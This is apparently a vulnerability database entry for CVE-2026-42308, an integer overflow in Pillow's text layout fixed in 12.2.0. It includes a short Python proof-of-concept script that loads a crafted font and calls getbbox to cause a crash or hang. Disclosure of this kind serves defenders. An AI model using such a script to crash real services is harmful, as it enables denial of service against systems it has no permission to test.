Security Vulnerability Report
CVE-2026-42308 CVSS 5.5 MEDIUM

CVE-2026-42308

Published: 2026-05-09 06:16:10
Last Modified: 2026-05-12 17:57:20

Description

Pillow is a Python imaging library. Prior to version 12.2.0, if a font advances for each glyph by an exceedingly large amount, the position that Pillow tracks while laying out text can overflow an integer. This issue has been patched in version 12.2.0.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:python:pillow:*:*:*:*:*:*:*:* - VULNERABLE
Pillow < 12.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
from PIL import ImageFont

# Proof of Concept for CVE-2026-42308
# This script attempts to load a crafted font file
# that contains an excessively large glyph advance.
# This triggers the integer overflow in Pillow < 12.2.0.

# Replace 'crafted_font.ttf' with the actual malicious file path
font_path = 'crafted_font.ttf'

try:
    # Load the font
    font = ImageFont.truetype(font_path, 20)
    print("Font loaded. Attempting to trigger overflow during processing...")

    # Processing text with the font triggers the position tracking logic
    text = "VULNERABLE"

    # Depending on the Pillow version, this might cause a crash or hang
    # due to the integer overflow in the advance calculation.
    # getbbox (like ImageDraw.textbbox) calls the underlying layout logic.
    left, top, right, bottom = font.getbbox(text)
    print(f"Processing complete. BBox: {left}, {top}, {right}, {bottom}")
except Exception as e:
    print(f"An exception occurred (expected in vulnerable versions): {e}")
```

References

https://github.com/python-pillow/Pillow/releases/tag/12.2.0 (Product, Release Notes)
https://github.com/python-pillow/Pillow/security/advisories/GHSA-wjx4-4jcj-g98j (Vendor Advisory)
